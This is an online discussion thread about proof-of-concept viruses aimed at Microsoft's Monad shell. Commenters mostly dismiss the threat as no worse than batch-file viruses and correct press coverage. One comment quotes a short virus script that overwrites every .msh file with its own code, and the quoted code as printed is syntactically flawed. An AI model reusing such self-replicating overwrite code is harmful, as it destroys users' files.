Windows Vista Tool Targeted By Virus Writers

An anonymous reader writes "Five proof-of-concept viruses that target Monad, the next version of Vista's command prompt, have been published on the web. Monad is a command line interface and scripting language that is similar to Unix shells such as bash, but is based on object-oriented programming and the .Net framework. The viruses' only action is to infect other shell scripts on the host's operating system. They would cause little harm in the wild, but would be relatively easy to modify using the information from the article, said Mikko Hyppönen, the director of antivirus research at F-Secure."

Re:Short on Details

[Leeji]

You got it right when you said "it might as well be a batch script." These are just Monad scripts running on the system, just like batch files, perl scripts, Cygwin bash scripts, Ruby scripts, etc.

There is nothing intrinsic in Monad that enables these attacks, aside from it being a new language. In fact, Monad implements several features that help mitigate the dangers of traditional script viruses, as I outline here.

Doesn't bode well...

[confusion]

For MS.

But seriously, this is like tipping over someone in a wheelchair. It's a BETA of WINDOWS. Hopefully MS will learn from this before the release, though. I'm not up for a whole new vector of threats against my windows boxen.

Jerry
http://www.cyvin.org/

Re:Comments from a Monad developer

[Osty]

The real question is why the heck they decided to call it "Monad"?!

The short answer: It's a codename. It won't ship with that name. Most likely it'll go with the less interesting "Microsoft Shell" or "msh".

The long answer: Monad and Monads in functional programming (long answer has been diverted to Wikipedia, because I'm lazy).

The non-answer: Get your mind of the gutter, you pervert. Not everything ending in "-nad" refers to genitalia.

Re:Short on Details

[Owndapan]

I believe Monad/MSH is no longer even a part of the Longhorn release, so it is a bit unfair have everyone jump on it as a Windows Vista exploit. From Wikipedia:

MSH was originally slated to be shipped with Windows Vista, but has since assumed its own release schedule. Microsoft sources have confirmed MSH's first public release will most likely precede the release of Vista and be part of the next edition of Microsoft Exchange, due in the second half of 2006.

An Example of One of the So-Called Viruses

[AdamBa]

This is the verbatim text of one of the five viruses:

$name_array=get-childitem *.msh
foreach ($name in $name_array)
{
if ($name.Length -eq 249)
$my_file=$name.Name
}
}

foreach ($victim in $name_array)
{
if ($name.Length -ne 249)
{
copy-item $my_file $name.Name
}
}

All it does is find every .msh file and replace its contents with itself. That's it. You could do it with a .CMD file in any version of Windows (and of course in any other scripting language).

The other scripts get a bit more complicated (insert at a random spot in the file, etc) but that's basically it. There's no new vulnerability exposed by Monad.

- adam

PC World has the most sensationalized version...

[AdamBa]

Right here. "Microsoft's newest operating system in beta only a week, but already leaky." Eeek!! It claims the viruses "take advantage of a new command shell, code-named Monad, that is included in the Windows Vista beta code". Only problem is, Monad is not included in the Windows Vista beta code. Then it talks about how they "take advantage of security vulnerabilities in the new command shell". Like the ability to run scripts?

- adam

Misleading topic

[Jugalator]

It should be "Windows XP/2003/Vista Tool Targeted By Virus Writers". It won't just be for Vista. The tool is also still in early beta, and I'm not even sure what the script did; is it a script like "rm *", or does it exploit any actual vulnerabilities? There's too little info here to know if this is anything to call news or not...

Monad will also not be included with Windows Vista RTM.

Re:PC World has the most sensationalized version..

[Jugalator]

"Only problem is, Monad is not included in the Windows Vista beta code."

It will probably not be included in the final Windows Vista code either.
It'll be a separate, downloadable tool for all MS OS'es since Windows XP.
I'm still looking for the connection to Windows Vista here...

i dont see why this is news....

[Madd+Scientist]

1) it's a scripting language
2) assume you already have command line access

a "virus" at this point is trivial... just append the code to append itself at the end of every file it assumes is a script for this command line.

this is like batch file viruses that format the drive... it isn't anything special, it's just a matter of getting the mark to run the file. nothing to see here.

Re:Short on Details

[mcrbids]

Yes but you must remember that F-Secure are a bunch of alarmist gits who will jump at any opportunity to seed panic with regard to threats... <SNIP>

What's funny is that f-secure makes f-prot, one of the better cheap-to-free antivirus software packages that works on both Windows and Linux.

What I love about the Windows version is that you can run it on some old P3-450 and still end up with a working machine. Try the same with Symantec and you end up with a paperweight.

Also, F-Prot works on Linux, and I scan some 250,000 emails per day on production mail servers using f-prot, with excellent results.

Sorry their marketing dept. sucks, but it's a good product!

Re:Short on Details

[Negatif]

Nope, FRISK Software makes F-Prot. Not sure if you're trolling or just being misinformed.

Everything that was once, will be again...

[Spoing]

"As for not running scripts in the current directory, Monad follows a policy similar to that of Unix shells: we do not run them, unless you explicitly ask us to. This prevents malicious scripts (with names such as dir.msh, or get-childitem.msh) from intercepting your otherwise innocent attempt to list the files in that directory."

As time goes on, they keep reinventing bits and pieces of Unix.